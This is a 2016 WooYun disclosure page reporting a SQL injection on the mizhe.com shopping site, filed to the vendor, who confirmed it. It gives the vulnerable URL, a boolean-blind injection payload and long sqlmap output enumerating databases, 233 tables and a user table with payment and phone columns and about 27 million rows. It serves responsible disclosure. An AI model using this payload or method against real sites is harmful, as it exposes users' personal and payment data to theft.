米折网主站一处高危注入 | wooyun-2016-0167029| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167029

漏洞标题：米折网主站一处高危注入

漏洞作者：花式

提交时间：2016-01-03 20:00

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-03：细节已通知厂商并且等待厂商处理中
2016-01-04：厂商已经确认，细节仅向厂商公开
2016-01-14：细节向核心白帽子及相关领域专家公开
2016-01-24：细节向普通白帽子公开
2016-02-03：细节向实习白帽子公开
2016-02-12：细节向公众公开

简要描述：

详细说明：

http://m.mizhe.com/resource/get_acs_config.html?platform=download_app

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: platform (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: platform=download_app' AND 1970=1970 AND 'iiay'='iiay
---
[17:05:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[17:05:13] [INFO] fetching current database
[17:05:13] [INFO] resumed: mizhe
current database:    'mizhe'
[17:05:13] [INFO] fetching database names
[17:05:13] [INFO] fetching number of databases
[17:05:13] [INFO] resumed: 8
[17:05:13] [INFO] resumed: information_schema
[17:05:13] [INFO] resumed: common
[17:05:13] [INFO] resumed: huxiucn
[17:05:13] [INFO] resumed: mizhe
[17:05:13] [INFO] resumed: mysql
[17:05:13] [INFO] resumed: mzinfo
[17:05:13] [INFO] resumed: performance_schema
[17:05:13] [INFO] resumed: test
available databases [8]:
[*] common
[*] huxiucn
[*] information_schema
[*] mizhe
[*] mysql
[*] mzinfo
[*] performance_schema
[*] test

核心数据库是mizhe

漏洞证明：

[17:05:47] [INFO] fetching tables for database: 'mizhe'
[17:05:47] [INFO] fetching number of tables for database 'mizhe'
[17:05:47] [INFO] resumed: 233
[17:05:47] [INFO] resumed: 28102_t
[17:05:47] [INFO] resumed: activity
[17:05:47] [INFO] resumed: activity_dress
[17:05:47] [INFO] resumed: activity_filter
[17:05:47] [INFO] resumed: activity_map
[17:05:47] [INFO] resumed: activity_resources
[17:05:47] [INFO] resumed: admin_authority
[17:05:47] [INFO] resumed: admin_permission
[17:05:47] [INFO] resumed: admin_uid
[17:05:47] [INFO] resumed: ams_adlist
[17:05:47] [INFO] resumed: anti_cheat_contact
[17:05:47] [INFO] resumed: api_permission
[17:05:47] [INFO] resumed: api_session
[17:05:47] [INFO] resumed: app_active_info
[17:05:47] [INFO] resumed: app_channel_track
[17:05:47] [INFO] resumed: app_uninstall_reason
[17:05:47] [INFO] resumed: app_uninstall_stat
[17:05:47] [INFO] resumed: article
[17:05:47] [INFO] resumed: award_config
[17:05:47] [INFO] resumed: award_detail
[17:05:47] [INFO] resumed: award_device_log
[17:05:47] [INFO] resumed: award_log
[17:05:47] [INFO] resumed: award_user
[17:05:47] [INFO] resumed: baby
[17:05:47] [INFO] resumed: baidu_push
[17:05:47] [INFO] resumed: batch_sql
[17:05:47] [INFO] resumed: black_lists
[17:05:47] [INFO] resumed: blacklist
[17:05:47] [INFO] resumed: brand_apply
[17:05:47] [INFO] resumed: brand_apply_history
[17:05:47] [INFO] resumed: brand_operator_stat
[17:05:47] [INFO] resumed: brand_recom
[17:05:47] [INFO] resumed: brand_sale_snapshot
[17:05:47] [INFO] resumed: brand_warehouse
[17:05:47] [INFO] resumed: buytrack
[17:05:47] [INFO] resumed: category
[17:05:47] [INFO] resumed: category_map
[17:05:47] [INFO] resumed: check_order_log
[17:05:47] [INFO] resumed: checkin_award
[17:05:47] [INFO] resumed: checkin_bonus
[17:05:47] [INFO] resumed: checkin_log
[17:05:47] [INFO] resumed: checkin_track
[17:05:47] [INFO] resumed: click_stat
[17:05:47] [INFO] resumed: clicks
[17:05:47] [INFO] resumed: codeword
[17:05:47] [INFO] resumed: coin
[17:05:47] [INFO] resumed: coin_clean_log
[17:05:47] [INFO] resumed: coin_coupon
[17:05:47] [INFO] resumed: coin_exchange_log
[17:05:47] [INFO] resumed: coin_log
[17:05:47] [INFO] resumed: coin_statistics
[17:05:47] [INFO] resumed: coins_award_config
[17:05:47] [INFO] resumed: coins_award_log
[17:05:47] [INFO] resumed: comment_log
[17:05:47] [INFO] resumed: comment_mall
[17:05:47] [INFO] resumed: comment_shai
[17:05:47] [INFO] resumed: comment_shai_vote
[17:05:47] [INFO] resumed: comment_tuan
[17:05:47] [INFO] resumed: comment_tuanyituan
[17:05:47] [INFO] resumed: comment_youpin
[17:05:47] [INFO] resumed: comment_zdm
[17:05:47] [INFO] resumed: comment_zdm_jx
[17:05:47] [INFO] resumed: comment_zdm_vote
[17:05:47] [INFO] resumed: comments
[17:05:47] [INFO] resumed: config
[17:05:47] [INFO] resumed: coupon
[17:05:47] [INFO] resumed: coupons
[17:05:47] [INFO] resumed: deposit_op_log
[17:05:47] [INFO] resumed: e1212_guess_price_log
[17:05:47] [INFO] resumed: event_0317
[17:05:47] [INFO] resumed: event_1212_coupons
[17:05:47] [INFO] resumed: event_1212_guess
[17:05:47] [INFO] resumed: event_1212_log
[17:05:47] [INFO] resumed: event_626_qua
[17:05:47] [INFO] resumed: event_data
[17:05:47] [INFO] resumed: event_seller
[17:05:47] [INFO] resumed: event_top_seller
[17:05:47] [INFO] resumed: expect
[17:05:47] [INFO] resumed: fedex_info
[17:05:47] [INFO] resumed: feed_param
[17:05:47] [INFO] resumed: feeds
[17:05:47] [INFO] resumed: finance
[17:05:47] [INFO] resumed: gdt_app_click
[17:05:47] [INFO] resumed: guang_comment
[17:05:47] [INFO] resumed: guang_like
[17:05:47] [INFO] resumed: guang_share
[17:05:47] [INFO] resumed: guang_tag
[17:05:47] [INFO] resumed: hds_cluster
[17:05:47] [INFO] resumed: hds_exe_history
[17:05:47] [INFO] resumed: hds_exe_plan
[17:05:47] [INFO] resumed: hds_template
[17:05:47] [INFO] resumed: i4_ios
[17:05:47] [INFO] resumed: independent_report
[17:05:47] [INFO] resumed: item_warehouse
[17:05:47] [INFO] resumed: kingsoft_ios
[17:05:47] [INFO] resumed: lottery
[17:05:47] [INFO] resumed: lottery2_config
[17:05:47] [INFO] resumed: lottery2_log
[17:05:47] [INFO] resumed: lottery_bigwheel
[17:05:47] [INFO] resumed: lottery_feedback
[17:05:47] [INFO] resumed: lottery_log
[17:05:47] [INFO] resumed: mall
[17:05:47] [INFO] resumed: mall_activity
[17:05:47] [INFO] resumed: mall_desc
[17:05:47] [INFO] resumed: mall_order
[17:05:47] [INFO] resumed: marketing_channels
[17:05:47] [INFO] resumed: marketing_stat
[17:05:47] [INFO] resumed: marketing_uid
[17:05:47] [INFO] resumed: mclicks
[17:05:47] [INFO] resumed: member
[17:05:47] [INFO] resumed: member_abnormal
[17:05:47] [INFO] resumed: member_abnormal_bak
[17:05:47] [INFO] resumed: member_app_download
[17:05:47] [INFO] resumed: member_beibei_download
[17:05:47] [INFO] resumed: member_click_stat_channel
[17:05:47] [INFO] resumed: member_favorite_brand
[17:05:47] [INFO] resumed: member_favorite_item
[17:05:47] [INFO] resumed: member_invitation
[17:05:47] [INFO] resumed: member_log
[17:05:47] [INFO] resumed: member_login_record
[17:05:47] [INFO] resumed: member_mission
[17:05:47] [INFO] resumed: member_msg
[17:05:47] [INFO] resumed: member_notice
[17:05:47] [INFO] resumed: member_profile
[17:05:47] [INFO] resumed: member_reg_award
[17:05:47] [INFO] resumed: member_secret
[17:05:47] [INFO] resumed: mission
[17:05:47] [INFO] resumed: monitor_config
[17:05:47] [INFO] resumed: monitor_log
[17:05:47] [INFO] resumed: msg
[17:05:47] [INFO] resumed: msg_text
[17:05:47] [INFO] resumed: mz_ads
[17:05:47] [INFO] resumed: mz_ads_config
[17:05:47] [INFO] resumed: mz_friend_link
[17:05:47] [INFO] resumed: mz_goods
[17:05:47] [INFO] resumed: mz_goods_order
[17:05:47] [INFO] resumed: mz_index_page
[17:05:47] [INFO] resumed: mz_mall_comment
[17:05:47] [INFO] resumed: notice
[17:05:47] [INFO] resumed: notice_opt
[17:05:47] [INFO] resumed: notice_text
[17:05:47] [INFO] resumed: oauth
[17:05:47] [INFO] resumed: op_log
[17:05:47] [INFO] resumed: operator
[17:05:47] [INFO] resumed: operator_statistics
[17:05:47] [INFO] resumed: order
[17:05:47] [INFO] resumed: order_history
[17:05:47] [INFO] resumed: order_history_count
[17:05:47] [INFO] resumed: outer_coins
[17:05:47] [INFO] resumed: partner
[17:05:47] [INFO] resumed: pay
[17:05:47] [INFO] resumed: permissions
[17:05:47] [INFO] resumed: promotion
[17:05:47] [INFO] resumed: push_token
[17:05:47] [INFO] resumed: quan_article
[17:05:47] [INFO] resumed: quan_category
[17:05:47] [INFO] resumed: quan_mall_coupon
[17:05:47] [INFO] resumed: quan_mall_coupon_code
[17:05:47] [INFO] resumed: quan_mall_coupon_desc
[17:05:47] [INFO] resumed: quan_mall_coupon_version
[17:05:47] [INFO] resumed: quan_tbcoupon
[17:05:47] [INFO] resumed: quan_tbindex_counter
[17:05:47] [INFO] resumed: quan_tboauth
[17:05:47] [INFO] resumed: quan_tbseller
[17:05:47] [INFO] resumed: quan_tbshop
[17:05:48] [INFO] resumed: quan_tbshop_coupon
[17:05:48] [INFO] resumed: quan_tbshop_desc
[17:05:48] [INFO] resumed: quan_user_coupon
[17:05:48] [INFO] resumed: rate
[17:05:48] [INFO] resumed: rebates_qualify
[17:05:48] [INFO] resumed: recently
[17:05:48] [INFO] resumed: reg_award
[17:05:48] [INFO] resumed: report
[17:05:48] [INFO] resumed: role_perm
[17:05:48] [INFO] resumed: roles
[17:05:48] [INFO] resumed: sales_calculate
[17:05:48] [INFO] resumed: sales_detail
[17:05:48] [INFO] resumed: sales_kpi
[17:05:48] [INFO] resumed: seller_account
[17:05:48] [INFO] resumed: seller_apply_info
[17:05:48] [INFO] resumed: seller_complain
[17:05:48] [INFO] resumed: seller_deposit
[17:05:48] [INFO] resumed: seller_freeze
[17:05:48] [INFO] resumed: seller_freeze_detail
[17:05:48] [INFO] resumed: seller_identity
[17:05:48] [INFO] resumed: seller_info
[17:05:48] [INFO] resumed: seller_punish_detail
[17:05:48] [INFO] resumed: settings
[17:05:48] [INFO] resumed: shai_text
[17:05:48] [INFO] resumed: shai_vote
[17:05:48] [INFO] resumed: shai_warehouse
[17:05:48] [INFO] resumed: shake
[17:05:48] [INFO] resumed: shake_log
[17:05:48] [INFO] resumed: show_member
[17:05:48] [INFO] resumed: show_rate
[17:05:48] [INFO] resumed: tao_blacklist
[17:05:48] [INFO] resumed: taobao_comment
[17:05:48] [INFO] resumed: task
[17:05:48] [INFO] resumed: task_config
[17:05:48] [INFO] resumed: tb_comm_rate
[17:05:48] [INFO] resumed: tbk_report
[17:05:48] [INFO] resumed: tmp_tuan_seller
[17:05:48] [INFO] resumed: tuan_admin
[17:05:48] [INFO] resumed: tuan_apply
[17:05:48] [INFO] resumed: tuan_apply2
[17:05:48] [INFO] resumed: tuan_apply_history
[17:05:48] [INFO] resumed: tuan_blacklist
[17:05:48] [INFO] resumed: tuan_buyer_report
[17:05:48] [INFO] resumed: tuan_cats_sale_stat
[17:05:48] [INFO] resumed: tuan_goods
[17:05:48] [INFO] resumed: tuan_operator
[17:05:48] [INFO] resumed: tuan_operator_admin
[17:05:48] [INFO] resumed: tuan_operator_category
[17:05:48] [INFO] resumed: tuan_operator_stat
[17:05:48] [INFO] resumed: tuan_sale_snapshot
[17:05:48] [INFO] resumed: tuan_seller
[17:05:48] [INFO] resumed: tuan_seller_op_log
[17:05:48] [INFO] resumed: tuan_text
[17:05:48] [INFO] resumed: tuan_warehouse
[17:05:48] [INFO] resumed: tuan_youpin
[17:05:48] [INFO] resumed: tuan_youpin_text
[17:05:48] [INFO] resumed: turl
[17:05:48] [INFO] resumed: turl_hits
[17:05:48] [INFO] resumed: user_role
[17:05:48] [INFO] resumed: whitelist
[17:05:48] [INFO] resumed: xinge_push
[17:05:48] [INFO] resumed: zdm_disclose
[17:05:48] [INFO] resumed: zdm_report
[17:05:48] [INFO] resumed: zdm_seolink
[17:05:48] [INFO] resumed: zdm_text
[17:05:48] [INFO] resumed: zdm_vote
[17:05:48] [INFO] resumed: zdm_warehouse
[17:05:48] [INFO] resumed: zhideguang
[17:05:48] [INFO] resumed: 87
[17:05:48] [INFO] resumed: 1268
[17:05:48] [INFO] resumed: 2678
[17:05:48] [INFO] resumed: 300811
[17:05:48] [INFO] resumed: 8
[17:05:48] [INFO] resumed: 2302841
[17:05:48] [INFO] resumed: 15275295
[17:05:48] [INFO] resumed: 15311
[17:05:48] [INFO] resumed: 4890539
[17:05:48] [INFO] resumed: 1368975
[17:05:48] [INFO] resumed: 1732982
[17:05:48] [INFO] resumed: 1573271
[17:05:48] [INFO] resumed: 8
[17:05:48] [INFO] resumed: 20358071
[17:05:48] [INFO] resumed: 56648
[17:05:48] [INFO] resumed: 108154
[17:05:48] [INFO] resumed: 27282345
[17:05:48] [INFO] resumed: 7622
[17:05:48] [INFO] resumed: 5643482
[17:05:48] [INFO] resumed: 1717064
[17:05:48] [INFO] resumed: 145132
[17:05:48] [INFO] resumed: 6
[17:05:48] [INFO] resumed: 18
[17:05:48] [INFO] resumed: 6885
[17:05:48] [INFO] resumed: 6415
[17:05:48] [INFO] resumed: 695
[17:05:48] [INFO] resumed: 6459245
[17:05:48] [INFO] resumed: 115772
[17:05:48] [INFO] resumed: 36
[17:05:48] [INFO] resumed: 726
[17:05:48] [INFO] resumed: 420274
[17:05:48] [INFO] resumed: 3
[17:05:48] [INFO] resumed: 1
[17:05:48] [INFO] resumed: 179945
[17:05:48] [INFO] resumed: 30
[17:05:48] [INFO] resumed: 174554
[17:05:48] [INFO] resumed: 561014
[17:05:48] [INFO] resumed: 4
[17:05:48] [INFO] resumed: 415
[17:05:48] [INFO] resumed: 63015
[17:05:48] [INFO] resumed: 129
[17:05:48] [INFO] resumed: 505320
[17:05:48] [INFO] resumed: 10
[17:05:48] [INFO] resumed: 254670
[17:05:48] [INFO] resumed: 443986
[17:05:48] [INFO] resumed: 62906
[17:05:48] [INFO] resumed: 9678
[17:05:48] [INFO] resumed: 191844
[17:05:48] [INFO] resumed: 10932945
[17:05:48] [INFO] resumed: 87
[17:05:48] [INFO] resumed: 4598
[17:05:48] [INFO] resumed: 16565528
[17:05:48] [INFO] resumed: 29131
[17:05:48] [INFO] resumed: 39615
[17:05:48] [INFO] resumed: 108154
[17:05:48] [INFO] resumed: 27
[17:05:48] [INFO] resumed: 31336
[17:05:48] [INFO] resumed: 119748
[17:05:48] [INFO] resumed: 1
[17:05:48] [INFO] resumed: 57
[17:05:48] [INFO] resumed: 58
[17:05:48] [INFO] resumed: 117345
[17:05:48] [INFO] resumed: 166939
[17:05:48] [INFO] resumed: 367
[17:05:48] [INFO] resumed: 1304664
[17:05:48] [INFO] resumed: 1622769
[17:05:48] [INFO] resumed: 5271
[17:05:48] [INFO] resumed: 733911
[17:05:48] [INFO] resumed: 81275
[17:05:48] [INFO] resumed: 119
[17:05:48] [INFO] resumed: 69
[17:05:48] [INFO] resumed: 8778
[17:05:48] [INFO] resumed: 30
[17:05:48] [INFO] resumed: 0
[17:05:48] [INFO] resumed: 137036
[17:05:48] [INFO] resumed: 0
[17:05:48] [INFO] resumed: 8
[17:05:48] [INFO] resumed: 739
[17:05:48] [INFO] resumed: 27
[17:05:48] [INFO] resumed: 119
[17:05:49] [INFO] resumed: 198
[17:05:49] [INFO] resumed: 26070
[17:05:49] [INFO] resumed: 9246
[17:05:49] [INFO] resumed: 1
[17:05:49] [INFO] resumed: 8258419
[17:05:49] [INFO] resumed: 830
[17:05:49] [INFO] resumed: 376271
[17:05:49] [INFO] resumed: 281
[17:05:49] [INFO] resumed: 128
[17:05:49] [INFO] resumed: 1105584
[17:05:49] [INFO] resumed: 2303
[17:05:49] [INFO] resumed: 243127
[17:05:49] [INFO] resumed: 1034464
[17:05:49] [INFO] resumed: 110770
[17:05:49] [INFO] resumed: 6903573
[17:05:49] [INFO] resumed: 3205564
[17:05:49] [INFO] resumed: 3062165
[17:05:49] [INFO] resumed: 0
[17:05:49] [INFO] resumed: 48
[17:05:49] [INFO] resumed: 355
[17:05:49] [INFO] resumed: 4333
[17:05:49] [INFO] resumed: 66
[17:05:49] [INFO] resumed: 124581
[17:05:49] [INFO] resumed: 350362
[17:05:49] [INFO] resumed: 93686
[17:05:49] [INFO] resumed: 1638
[17:05:49] [INFO] resumed: 22
[17:05:49] [INFO] resumed: 42
[17:05:49] [INFO] resumed: 48
[17:05:49] [INFO] resumed: 96117
[17:05:49] [INFO] resumed: 6829573
[17:05:49] [INFO] resumed: 19215
[17:05:49] [INFO] resumed: 6804
[17:05:49] [INFO] resumed: 132
[17:05:49] [INFO] resumed: 1021112
[17:05:49] [INFO] resumed: 91
[17:05:49] [INFO] resumed: 160
[17:05:49] [INFO] resumed: 664919
[17:05:49] [INFO] resumed: 1570
[17:05:49] [INFO] resumed: 1802
[17:05:49] [INFO] resumed: 24
[17:05:49] [INFO] resumed: 28944
[17:05:49] [INFO] resumed: 0
[17:05:49] [INFO] resumed: 67417
[17:05:49] [INFO] resumed: 161
[17:05:49] [INFO] resumed: 46
[17:05:49] [INFO] resumed: 28944
[17:05:49] [INFO] resumed: 410
[17:05:49] [INFO] resumed: 3412
[17:05:49] [INFO] resumed: 12430
[17:05:49] [INFO] resumed: 14926
[17:05:49] [INFO] resumed: 5089862
[17:05:49] [INFO] resumed: 225875
[17:05:49] [INFO] resumed: 1502
[17:05:49] [INFO] resumed: 5117
[17:05:49] [INFO] resumed: 27283133
[17:05:49] [INFO] resumed: 27270
[17:05:49] [INFO] resumed: 6903552
[17:05:49] [INFO] resumed: 9444
[17:05:49] [INFO] resumed: 3
[17:05:49] [INFO] resumed: 7906300
[17:05:49] [INFO] resumed: 538
[17:05:49] [INFO] resumed: 1734
[17:05:49] [INFO] resumed: 195592
[17:05:49] [INFO] resumed: 137383
[17:05:49] [INFO] resumed: 829
[17:05:49] [INFO] resumed: 13
[17:05:49] [INFO] resumed: 8870
[17:05:49] [INFO] resumed: 189
[17:05:49] [INFO] resumed: 1
[17:05:49] [INFO] resumed: 88007
[17:05:49] [INFO] resumed: 3506919
[17:05:49] [INFO] resumed: 10
[17:05:49] [INFO] resumed: 227213
[17:05:49] [INFO] resumed: 141646
[17:05:49] [INFO] resumed: 190
[17:05:49] [INFO] resumed: 20250443
[17:05:49] [INFO] resumed: 3424
[17:05:49] [INFO] resumed: 716144
[17:05:49] [INFO] resumed: 418669
[17:05:49] [INFO] resumed: 68459
[17:05:49] [INFO] resumed: 2610
[17:05:49] [INFO] resumed: 78623
[17:05:49] [INFO] resumed: 26
[17:05:49] [INFO] resumed: 270946
[17:05:49] [INFO] resumed: 471416
[17:05:49] [INFO] resumed: 2

Database: mizhe
[233 tables]
+---------------------------+
| 28102_t                   |
| order                     |
| activity                  |
| activity_dress            |
| activity_filter           |
| activity_map              |
| activity_resources        |
| admin_authority           |
| admin_permission          |
| admin_uid                 |
| ams_adlist                |
| anti_cheat_contact        |
| api_permission            |
| api_session               |
| app_active_info           |
| app_channel_track         |
| app_uninstall_reason      |
| app_uninstall_stat        |
| article                   |
| award_config              |
| award_detail              |
| award_device_log          |
| award_log                 |
| award_user                |
| baby                      |
| baidu_push                |
| batch_sql                 |
| black_lists               |
| blacklist                 |
| brand_apply               |
| brand_apply_history       |
| brand_operator_stat       |
| brand_recom               |
| brand_sale_snapshot       |
| brand_warehouse           |
| buytrack                  |
| category                  |
| category_map              |
| check_order_log           |
| checkin_award             |
| checkin_bonus             |
| checkin_log               |
| checkin_track             |
| click_stat                |
| clicks                    |
| codeword                  |
| coin                      |
| coin_clean_log            |
| coin_coupon               |
| coin_exchange_log         |
| coin_log                  |
| coin_statistics           |
| coins_award_config        |
| coins_award_log           |
| comment_log               |
| comment_mall              |
| comment_shai              |
| comment_shai_vote         |
| comment_tuan              |
| comment_tuanyituan        |
| comment_youpin            |
| comment_zdm               |
| comment_zdm_jx            |
| comment_zdm_vote          |
| comments                  |
| config                    |
| coupon                    |
| coupons                   |
| deposit_op_log            |
| e1212_guess_price_log     |
| event_0317                |
| event_1212_coupons        |
| event_1212_guess          |
| event_1212_log            |
| event_626_qua             |
| event_data                |
| event_seller              |
| event_top_seller          |
| expect                    |
| fedex_info                |
| feed_param                |
| feeds                     |
| finance                   |
| gdt_app_click             |
| guang_comment             |
| guang_like                |
| guang_share               |
| guang_tag                 |
| hds_cluster               |
| hds_exe_history           |
| hds_exe_plan              |
| hds_template              |
| i4_ios                    |
| independent_report        |
| item_warehouse            |
| kingsoft_ios              |
| lottery                   |
| lottery2_config           |
| lottery2_log              |
| lottery_bigwheel          |
| lottery_feedback          |
| lottery_log               |
| mall                      |
| mall_activity             |
| mall_desc                 |
| mall_order                |
| marketing_channels        |
| marketing_stat            |
| marketing_uid             |
| mclicks                   |
| member                    |
| member_abnormal           |
| member_abnormal_bak       |
| member_app_download       |
| member_beibei_download    |
| member_click_stat_channel |
| member_favorite_brand     |
| member_favorite_item      |
| member_invitation         |
| member_log                |
| member_login_record       |
| member_mission            |
| member_msg                |
| member_notice             |
| member_profile            |
| member_reg_award          |
| member_secret             |
| mission                   |
| monitor_config            |
| monitor_log               |
| msg                       |
| msg_text                  |
| mz_ads                    |
| mz_ads_config             |
| mz_friend_link            |
| mz_goods                  |
| mz_goods_order            |
| mz_index_page             |
| mz_mall_comment           |
| notice                    |
| notice_opt                |
| notice_text               |
| oauth                     |
| op_log                    |
| operator                  |
| operator_statistics       |
| order_history             |
| order_history_count       |
| outer_coins               |
| partner                   |
| pay                       |
| permissions               |
| promotion                 |
| push_token                |
| quan_article              |
| quan_category             |
| quan_mall_coupon          |
| quan_mall_coupon_code     |
| quan_mall_coupon_desc     |
| quan_mall_coupon_version  |
| quan_tbcoupon             |
| quan_tbindex_counter      |
| quan_tboauth              |
| quan_tbseller             |
| quan_tbshop               |
| quan_tbshop_coupon        |
| quan_tbshop_desc          |
| quan_user_coupon          |
| rate                      |
| rebates_qualify           |
| recently                  |
| reg_award                 |
| report                    |
| role_perm                 |
| roles                     |
| sales_calculate           |
| sales_detail              |
| sales_kpi                 |
| seller_account            |
| seller_apply_info         |
| seller_complain           |
| seller_deposit            |
| seller_freeze             |
| seller_freeze_detail      |
| seller_identity           |
| seller_info               |
| seller_punish_detail      |
| settings                  |
| shai_text                 |
| shai_vote                 |
| shai_warehouse            |
| shake                     |
| shake_log                 |
| show_member               |
| show_rate                 |
| tao_blacklist             |
| taobao_comment            |
| task                      |
| task_config               |
| tb_comm_rate              |
| tbk_report                |
| tmp_tuan_seller           |
| tuan_admin                |
| tuan_apply                |
| tuan_apply2               |
| tuan_apply_history        |
| tuan_blacklist            |
| tuan_buyer_report         |
| tuan_cats_sale_stat       |
| tuan_goods                |
| tuan_operator             |
| tuan_operator_admin       |
| tuan_operator_category    |
| tuan_operator_stat        |
| tuan_sale_snapshot        |
| tuan_seller               |
| tuan_seller_op_log        |
| tuan_text                 |
| tuan_warehouse            |
| tuan_youpin               |
| tuan_youpin_text          |
| turl                      |
| turl_hits                 |
| user_role                 |
| whitelist                 |
| xinge_push                |
| zdm_disclose              |
| zdm_report                |
| zdm_seolink               |
| zdm_text                  |
| zdm_vote                  |
| zdm_warehouse             |
| zhideguang                |
+---------------------------+

Database: mizhe
Table: member
[25 columns]
+--------------+----------------------+
| Column       | Type                 |
+--------------+----------------------+
| alipay       | varchar(40)          |
| app          | tinyint(3) unsigned  |
| auth_str     | varchar(40)          |
| avatar       | varchar(255)         |
| coin         | int(11)              |
| coupon_sum   | int(10) unsigned     |
| expenses_sum | int(10) unsigned     |
| gmt_create   | int(10) unsigned     |
| grade        | tinyint(1)           |
| id           | bigint(20) unsigned  |
| income_sum   | int(10) unsigned     |
| login_time   | int(10) unsigned     |
| multi_sign   | smallint(5) unsigned |
| nick         | varchar(32)          |
| parent_id    | int(10) unsigned     |
| partner_type | tinyint(1) unsigned  |
| payed_sum    | int(10) unsigned     |
| real_name    | varchar(20)          |
| rebate_sum   | int(10) unsigned     |
| share_sum    | int(10) unsigned     |
| status       | varchar(10)          |
| tbrebate_sum | int(10) unsigned     |
| tel          | varchar(20)          |
| uid          | int(10) unsigned     |
| user_name    | varchar(32)          |
+--------------+----------------------+
[17:07:53] [INFO] resumed: 27282345
Database: mizhe
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 27282345 |
+--------+---------+

、不深入了。。。
有小礼物吗？

修复方案：

你们比我懂！

版权声明：转载请注明来源花式@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-01-04 14:19

厂商回复：

感谢反馈，我们会尽快修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167029

漏洞标题：米折网主站一处高危注入

相关厂商：米折网

漏洞作者：花式

提交时间：2016-01-03 20:00

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源花式@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0167029

漏洞标题：米折网主站一处高危注入

相关厂商：米折网

漏洞作者： 花式

提交时间：2016-01-03 20:00

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0167029"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 花式@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：花式

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源花式@乌云